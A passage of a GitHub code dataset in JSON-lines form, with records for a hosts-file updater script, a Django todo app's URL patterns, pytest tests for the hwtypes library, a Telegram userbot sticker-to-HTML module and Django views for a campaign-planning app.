"KimmyXYC/BiliLive-Auto-Streaming", "sub_path": "App/Stream.py", "file_name": "Stream.py", "file_ext": "py", "file_size_in_byte": 2024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 67, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 17, "usage_type": "call"}, {"api_name": "loguru.logger.info", "line_number": 20, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "loguru.logger.info", "line_number": 25, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 25, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "loguru.logger.info", "line_number": 32, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 51, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 51, "usage_type": "attribute"}, {"api_name": "loguru.logger.debug", "line_number": 54, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "40104635624", "text": "#! /Users/jinpeng/miniconda3/bin/python\nimport requests\nimport os\nimport re\n\nurl = 'https://raw.hellogithub.com/hosts'\nresponse = requests.get(url)\n\nif response.status_code == 200:\n hosts_file_path = '/etc/hosts'\n\n with open(hosts_file_path, 'r') as f:\n hosts_file_contents = f.readlines()\n\n start_line = None\n end_line = None\n\n for i, line in enumerate(hosts_file_contents):\n if line.strip() == '# GitHub520 Host Start':\n start_line = i\n elif line.strip() == '# GitHub520 Host End':\n end_line = i\n\n if start_line is not None and end_line is not None:\n delimiter = '\\n'\n new_lines = re.split(f'(?<={delimiter})', response.text)\n hosts_file_contents[start_line:end_line+1] = new_lines\n with open(hosts_file_path, 'w') as f:\n f.writelines(hosts_file_contents)\n print('Content replaced successfully.')\n else:\n print('Could not find start and end markers in the hosts file.')\nelse:\n print(f'Error downloading file. Status code: {response.status_code}')\n\n", "repo_name": "jinpeng/codesnippets", "sub_path": "python/update_github_hosts.py", "file_name": "update_github_hosts.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "re.split", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "18475289911", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='todo'),\n path('archive/', views.archive, name='archive'),\n path('about/', views.about, name='about'),\n path('create/', views.create, name='create'),\n path('<int:pk>/update', views.TodoUpdateView.as_view(), name='todo_update'),\n path('<int:pk>/delete', views.TodoDeleteView.as_view(), name='todo_delete'),\n path('<int:pk>/done', views.done, name='todo_done')\n]", "repo_name": "ek2kk/todolist", "sub_path": "todo/main/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 475, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "38751694751", "text": "import pytest\nimport operator\nimport random\nfrom itertools import product\n\nfrom hwtypes import SIntVector, BitVector, Bit\nfrom hwtypes.bit_vector_abc import InconsistentSizeError\nfrom hwtypes.bit_vector_util import PolyVector, PolyBase\n\ndef _rand_bv(width):\n return BitVector[width](random.randint(0, (1 << width) - 1))\n\ndef _rand_signed(width):\n return SIntVector[width](random.randint(0, (1 << width) - 1))\n\n\ndef _rand_int(width):\n return random.randint(0, (1 << width) - 1)\n\n@pytest.mark.parametrize(\"op\", [\n operator.and_,\n operator.or_,\n operator.xor,\n operator.lshift,\n operator.rshift,\n ])\n@pytest.mark.parametrize(\"width1\", (1, 2))\n@pytest.mark.parametrize(\"width2\", (1, 2))\n@pytest.mark.parametrize(\"use_int\", (False, True))\ndef test_bin(op, width1, width2, use_int):\n x = _rand_bv(width1)\n if use_int:\n y = _rand_int(width2)\n res = op(x, y)\n assert type(res) is type(x)\n else:\n y = _rand_bv(width2)\n if width1 != width2:\n assert type(x) is not type(y)\n with pytest.raises(InconsistentSizeError):\n op(x, y)\n else:\n assert type(x) is type(y)\n res = op(x, y)\n assert type(res) is type(x)\n\n\n@pytest.mark.parametrize(\"op\", [\n operator.eq,\n operator.ne,\n operator.lt,\n operator.le,\n operator.gt,\n operator.ge,\n ])\n@pytest.mark.parametrize(\"width1\", (1, 2))\n@pytest.mark.parametrize(\"width2\", (1, 2))\n@pytest.mark.parametrize(\"use_int\", (False, True))\ndef test_comp(op, width1, width2, use_int):\n x = _rand_bv(width1)\n if use_int:\n y = _rand_int(width2)\n res = op(x, y)\n assert type(res) is Bit\n else:\n y = _rand_bv(width2)\n if width1 != width2:\n assert type(x) is not type(y)\n with pytest.raises(InconsistentSizeError):\n op(x, y)\n else:\n assert type(x) is type(y)\n res = op(x, y)\n assert type(res) is Bit\n\n\n@pytest.mark.parametrize(\"t_constructor\", (_rand_bv, _rand_signed, _rand_int))\n@pytest.mark.parametrize(\"t_size\", (1, 2, 4))\n@pytest.mark.parametrize(\"f_constructor\", (_rand_bv, _rand_signed, _rand_int))\n@pytest.mark.parametrize(\"f_size\", (1, 2, 4))\ndef test_ite(t_constructor, t_size, f_constructor, f_size):\n pred = Bit(_rand_int(1))\n t = t_constructor(t_size)\n f = f_constructor(f_size)\n\n t_is_bv_constructor = t_constructor in {_rand_signed, _rand_bv}\n f_is_bv_constructor = f_constructor in {_rand_signed, _rand_bv}\n sizes_equal = t_size == f_size\n\n if (t_constructor is f_constructor and t_is_bv_constructor and sizes_equal):\n # The same bv_constructor\n res = pred.ite(t, f)\n assert type(res) is type(t)\n elif t_is_bv_constructor and f_is_bv_constructor and sizes_equal:\n # Different bv_constuctor\n res = pred.ite(t, f)\n # The bases should be the most specific types that are common\n # to both branches and PolyBase.\n assert isinstance(res, PolyBase)\n assert isinstance(res, BitVector[t_size])\n elif t_is_bv_constructor and f_is_bv_constructor and not sizes_equal:\n # BV with different size\n with pytest.raises(InconsistentSizeError):\n res = pred.ite(t, f)\n else:\n # Trying to coerce an int\n with pytest.raises(TypeError):\n res = pred.ite(t, f)\n", "repo_name": "leonardt/hwtypes", "sub_path": "tests/test_optypes.py", "file_name": "test_optypes.py", "file_ext": "py", "file_size_in_byte": 3730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hwtypes.BitVector", "line_number": 11, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 11, "usage_type": "call"}, {"api_name": "hwtypes.SIntVector", "line_number": 14, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 14, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 18, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 40, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_abc.InconsistentSizeError", "line_number": 40, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "operator.and_", "line_number": 21, "usage_type": "attribute"}, {"api_name": "operator.or_", "line_number": 22, "usage_type": "attribute"}, {"api_name": "operator.xor", "line_number": 23, "usage_type": "attribute"}, {"api_name": "operator.lshift", "line_number": 24, "usage_type": "attribute"}, {"api_name": "operator.rshift", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 29, "usage_type": "attribute"}, {"api_name": "hwtypes.Bit", "line_number": 64, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 69, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_abc.InconsistentSizeError", "line_number": 69, "usage_type": "argument"}, {"api_name": "hwtypes.Bit", "line_number": 74, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 48, "usage_type": "attribute"}, {"api_name": "operator.eq", "line_number": 49, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 50, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 51, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 52, "usage_type": "attribute"}, {"api_name": "operator.gt", "line_number": 53, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 56, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 57, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 58, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 58, "usage_type": "attribute"}, {"api_name": "hwtypes.Bit", "line_number": 82, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_util.PolyBase", "line_number": 99, "usage_type": "argument"}, {"api_name": "hwtypes.BitVector", "line_number": 100, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 103, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_abc.InconsistentSizeError", "line_number": 103, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 107, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 77, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 79, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 80, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "30129913965", "text": "#by Sh1vam\n#Kangers stay away\n\nimport os\nfrom ub import bot as javes\nimport subprocess, os , asyncio, shutil\nfrom ub.utils import admin_cmd\n\n@javes.on(admin_cmd(\"html\"))\nasync def messup(message):\n await message.edit(\"`making HTML....`\")\n reply = await message.get_reply_message()\n stkr = await reply.download_media(\"tgs.tgs\")\n process = await asyncio.create_subprocess_shell(f\"lottie_convert.py --frame 0 -if lottie -of html tgs.tgs shivam.html\",stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await process.communicate()\n os.remove(stkr)\n if message.reply_to_msg_id:\n message_id = message.reply_to_msg_id\n \n await message.client.send_file(message.chat_id, \"shivam.html\",force_document=False,reply_to=message_id)\n os.remove(\"shivam.html\")\n os.remove(\"tgs.tgs\")\n await message.delete()\n \n \n \n \n", "repo_name": "theshashankk/WhiteDevil-WC-", "sub_path": "ub/modules/tgsmarkup.py", "file_name": "tgsmarkup.py", "file_ext": "py", "file_size_in_byte": 866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asyncio.create_subprocess_shell", "line_number": 14, "usage_type": "call"}, {"api_name": "asyncio.subprocess", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 16, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 22, "usage_type": "call"}, {"api_name": "ub.bot.on", "line_number": 9, "usage_type": "call"}, {"api_name": "ub.bot", "line_number": 9, "usage_type": "name"}, {"api_name": "ub.utils.admin_cmd", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "2261449235", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse, reverse_lazy\nfrom django.http import Http404\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import UpdateView, CreateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Camp, MasterStage, Stage, \\\n MasterTask, Task, MasterItem, Item, \\\n MasterCollateral, Collateral\n# from .forms import ProjectForm, PicForm, LinkForm\n\n# **** Camp ****\n\nclass CampListView(LoginRequiredMixin, ListView):\n model = Camp\n\n def get_context_data(self, **kwargs):\n context = super(CampListView, self).get_context_data(**kwargs)\n try:\n master_stages = MasterStage.objects.all()\n context['master_stages'] = master_stages\n print(master_stages)\n except:\n pass\n\n # except Registration.DoesNotExist:\n # registration = None\n\n return context\n\n\nclass CampListTreeView(LoginRequiredMixin, ListView):\n model = Camp\n template_name = 'funnel/camp_tree_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(CampListTreeView, self).get_context_data(**kwargs)\n try:\n source_camps = Camp.objects.filter(origin__isnull=True)\n print('Hi')\n context['source_camps'] = source_camps\n print(source_camps)\n except:\n pass\n\n # except Registration.DoesNotExist:\n # registration = None\n\n return context\n\nclass CampCreateView(LoginRequiredMixin, CreateView):\n model=Camp\n fields = ['title', 'departement', 'participating_num']\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.owner = self.request.user\n obj.save()\n\n # populate Campaign here\n try:\n master_stages = MasterStage.objects.all()\n # Create stages\n for master_stage in master_stages:\n stage = Stage.objects.create(\n title=master_stage.title,\n description=master_stage.description,\n reference=master_stage,\n camp=obj,\n )\n # create tasks\n master_tasks = MasterTask.objects.filter(master_stage=master_stage)\n for master_task in master_tasks:\n task = Task.objects.create(title=master_task.title,\n description=master_task.description,\n reference=master_task,\n stage=stage,\n )\n # create items\n master_items = MasterItem.objects.filter(master_task=master_task)\n for master_item in master_items:\n item = Item.objects.create(title=master_item.title,\n reference=master_item,\n task=task,\n )\n # create collaterals\n master_collaterals = MasterCollateral.objects.filter(master_item=master_item)\n for master_collateral in master_collaterals:\n collateral = Collateral.objects.create(description=master_collateral.description,\n item=item,\n reference=master_collateral,\n collateral_type=master_collateral.collateral_type,\n )\n\n except:\n pass\n\n\n return super().form_valid(form)\n\n\nclass CampCreateViewFromSource(LoginRequiredMixin, CreateView):\n model = Camp\n fields = ['title', 'departement', 'participating_num']\n\n def form_valid(self, form):\n dst_camp = form.save(commit=False)\n dst_camp.owner = self.request.user\n dst_camp.save()\n\n # Populate new campaign based on source campaign\n try:\n print('Hi')\n src_camp = get_object_or_404(Camp, pk=self.kwargs['source_pk'])\n print(src_camp)\n dst_camp.origin = src_camp\n dst_camp.save()\n\n src_stages = Stage.objects.filter(camp=src_camp)\n print(src_stages)\n for src_stage in src_stages:\n stage = Stage.objects.create(\n camp=dst_camp,\n title=src_stage.title,\n description=src_stage.description,\n )\n print(stage)\n\n src_tasks = Task.objects.filter(stage=src_stage)\n for src_task in src_tasks:\n task = Task.objects.create(\n title=src_task.title,\n description=src_task.description,\n stage=stage,\n )\n\n src_items = Item.objects.filter(task=src_task)\n for src_item in src_items:\n item = Item.objects.create(\n title=src_item.title,\n description=src_item.description,\n task=task,\n )\n\n src_collaterals = Collateral.objects.filter(item=src_item)\n print(src_collaterals)\n for src_collateral in src_collaterals:\n collateral = Collateral.objects.create(\n description=src_collateral.description,\n item=item,\n collateral_type=src_collateral.collateral_type,\n url=src_collateral.url,\n file=src_collateral.file,\n image=src_collateral.image,\n )\n except:\n pass\n\n return super().form_valid(form)\n\n\n\n\nclass CampDetailView(LoginRequiredMixin, DetailView):\n model = Camp\n\n\nclass CampUpdateView(LoginRequiredMixin, UpdateView):\n model = Camp\n fields = ['title', 'departement', 'participating_num']\n\n # making sure only the owner can update\n def get_object(self):\n camp = super(CampUpdateView, self).get_object()\n if not camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return camp\n\n# *** Stage ****\n\nclass StageUpdateView(LoginRequiredMixin, UpdateView):\n model=Stage\n fields = ['title', 'description', 'start_ww', 'end_ww']\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.camp.pk })\n\n def get_object(self):\n stage = super(StageUpdateView, self).get_object()\n if not stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return stage\n\n\nclass StageCreateView(LoginRequiredMixin, CreateView):\n model = Stage\n fields = ['title', 'description', 'start_ww', 'end_ww']\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n camp = get_object_or_404(Camp, pk=self.kwargs['camp_pk'])\n obj.camp = camp\n if not camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n obj.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.camp.pk })\n\n\nclass StageDeleteView(LoginRequiredMixin, DeleteView):\n model = Stage\n\n def dispatch(self, request, *args, **kwargs):\n stage = get_object_or_404(Stage, pk=kwargs['pk'])\n if request.user != stage.camp.owner:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.camp.pk })\n\n# *** Tasks ****\n\n# Create\nclass TaskCreateView(LoginRequiredMixin, CreateView):\n model = Task\n fields = ['title', 'description']\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n stage = get_object_or_404(Stage, pk=self.kwargs['stage_pk'])\n obj.stage = stage\n if not stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n obj.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return redirect(request.META['HTTP_REFERER'])\n # return reverse('funnel:camp_detail', kwargs={'pk': self.object.stage.camp.pk })\n\nclass TaskDetailView(LoginRequiredMixin,DetailView):\n model = Task\n\n# Update\nclass TaskUpdateView(LoginRequiredMixin, UpdateView):\n model = Task\n fields = ['title', 'description']\n\n # here you can make your custom validation for any particular user\n def dispatch(self, request, *args, **kwargs):\n task = get_object_or_404(Task, pk=kwargs['pk'])\n if request.user != task.stage.camp.owner:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.stage.camp.pk })\n\n# DELETE\nclass TaskDeleteView(LoginRequiredMixin, DeleteView):\n model = Task\n\n def dispatch(self, request, *args, **kwargs):\n task = get_object_or_404(Task, pk=kwargs['pk'])\n if request.user != task.stage.camp.owner:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.stage.camp.pk })\n\n# **** Items ******\n#CrUD\n\nclass ItemCreateView(LoginRequiredMixin, CreateView):\n model = Item\n fields = ['title', 'description']\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n task = get_object_or_404(Task, pk=self.kwargs['task_pk'])\n obj.task = task\n if not task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n obj.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.task.stage.camp.pk })\n\n\nclass ItemDetailView(LoginRequiredMixin, DetailView):\n model = Item\n\n\nclass ItemUpdateView(LoginRequiredMixin, UpdateView):\n model = Item\n fields = ['title', 'description']\n\n def dispatch(self, request, *args, **kwargs):\n item = get_object_or_404(Item, pk=kwargs['pk'])\n if request.user != item.task.stage.camp.owner:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.task.stage.camp.pk })\n\n\nclass ItemDeleteView(LoginRequiredMixin, DeleteView):\n model = Item\n\n def dispatch(self, request, *args, **kwargs):\n item = get_object_or_404(Item, pk=kwargs['pk'])\n if request.user != item.task.stage.camp.owner:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.task.stage.camp.pk })\n\n\ndef item_complete(request, pk):\n item = get_object_or_404(Item, pk=pk)\n if item.task.stage.camp.owner == request.user:\n item.complete()\n item.save()\n return redirect('funnel:camp_detail', pk=item.task.stage.camp.pk)\n\n\ndef item_decomplete(request, pk):\n item = get_object_or_404(Item, pk=pk)\n if item.task.stage.camp.owner == request.user:\n item.decomplete()\n item.save()\n return redirect('funnel:camp_detail', pk=item.task.stage.camp.pk)\n\n\n# ***** Collaterals ******\nclass CollateralAddImage(LoginRequiredMixin, CreateView):\n model = Collateral\n fields = ['description', 'image']\n template_name = 'funnel/image_form.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n item = get_object_or_404(Item, pk=self.kwargs['item_pk'])\n obj.item = item\n obj.collateral_type = 'IM'\n if not item.task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this.')\n obj.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail',\n kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralAddFile(LoginRequiredMixin, CreateView):\n model = Collateral\n fields = ['description', 'file']\n template_name = 'funnel/file_form.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n item = get_object_or_404(Item, pk=self.kwargs['item_pk'])\n obj.item = item\n obj.collateral_type = 'FI'\n if not item.task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this.')\n obj.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail',\n kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralAddLink(LoginRequiredMixin, CreateView):\n model = Collateral\n fields = ['description', 'url']\n template_name = 'funnel/link_form.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n item = get_object_or_404(Item, pk=self.kwargs['item_pk'])\n obj.item = item\n obj.collateral_type = 'LI'\n if not item.task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this.')\n obj.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail',\n kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralUpdateImage(LoginRequiredMixin, UpdateView):\n model = Collateral\n fields = ['description', 'image']\n template_name = 'funnel/image_form.html'\n\n def get_object(self):\n collateral = super(CollateralUpdateImage, self).get_object()\n if not collateral.item.task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return collateral\n\n def get_success_url(self):\n return reverse('funnel:camp_detail',\n kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralUpdateFile(LoginRequiredMixin, UpdateView):\n model = Collateral\n fields = ['description', 'file']\n template_name = 'funnel/file_form.html'\n\n def get_object(self):\n collateral = super(CollateralUpdateFile, self).get_object()\n if not collateral.item.task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return collateral\n\n def get_success_url(self):\n return reverse('funnel:camp_detail',\n kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralUpdateLink(LoginRequiredMixin, UpdateView):\n model = Collateral\n fields = ['description', 'url']\n template_name = 'funnel/image_form.html'\n\n def get_object(self):\n collateral = super(CollateralUpdateLink, self).get_object()\n if not collateral.item.task.stage.camp.owner == self.request.user:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return collateral\n\n def get_success_url(self):\n return reverse('funnel:camp_detail',\n kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralDeleteView(LoginRequiredMixin, DeleteView):\n model = Collateral\n\n def dispatch(self, request, *args, **kwargs):\n collateral = get_object_or_404(Collateral, pk=kwargs['pk'])\n if request.user != collateral.item.task.stage.camp.owner:\n raise Http404('You dontt have permission to do this. go away you hacker')\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('funnel:camp_detail', kwargs={'pk': self.object.item.task.stage.camp.pk })\n", "repo_name": "avisalmon/matazim", "sub_path": "funnel/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 17250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 16, "usage_type": "name"}, {"api_name": "django.views.generic.list.ListView", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 17, "usage_type": "name"}, {"api_name": "models.MasterStage.objects.all", "line_number": 22, "usage_type": "call"}, {"api_name": "models.MasterStage.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.MasterStage", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.views.generic.list.ListView", "line_number": 34, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Camp.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Camp.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Camp", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 53, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 53, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 54, "usage_type": "name"}, {"api_name": "models.MasterStage.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "models.MasterStage.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.MasterStage", "line_number": 64, "usage_type": "name"}, {"api_name": "models.Stage.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "models.Stage.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.Stage", "line_number": 67, "usage_type": "name"}, {"api_name": "models.MasterTask.objects.filter", "line_number": 74, "usage_type": "call"}, {"api_name": "models.MasterTask.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "models.MasterTask", "line_number": 74, "usage_type": "name"}, {"api_name": "models.Task.objects.create", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 76, "usage_type": "name"}, {"api_name": "models.MasterItem.objects.filter", "line_number": 82, "usage_type": "call"}, {"api_name": "models.MasterItem.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.MasterItem", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Item.objects.create", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 84, "usage_type": "name"}, {"api_name": "models.MasterCollateral.objects.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "models.MasterCollateral.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.MasterCollateral", "line_number": 89, "usage_type": "name"}, {"api_name": "models.Collateral.objects.create", "line_number": 91, "usage_type": "call"}, {"api_name": "models.Collateral.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.Collateral", "line_number": 91, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 104, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 104, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 105, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 116, "usage_type": "call"}, {"api_name": "models.Camp", "line_number": 116, "usage_type": "argument"}, {"api_name": "models.Stage.objects.filter", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Stage.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Stage", "line_number": 121, "usage_type": "name"}, {"api_name": "models.Stage.objects.create", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Stage.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Stage", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Task.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 131, "usage_type": "name"}, {"api_name": "models.Task.objects.create", "line_number": 133, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 133, "usage_type": "name"}, {"api_name": "models.Item.objects.filter", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 139, "usage_type": "name"}, {"api_name": "models.Item.objects.create", 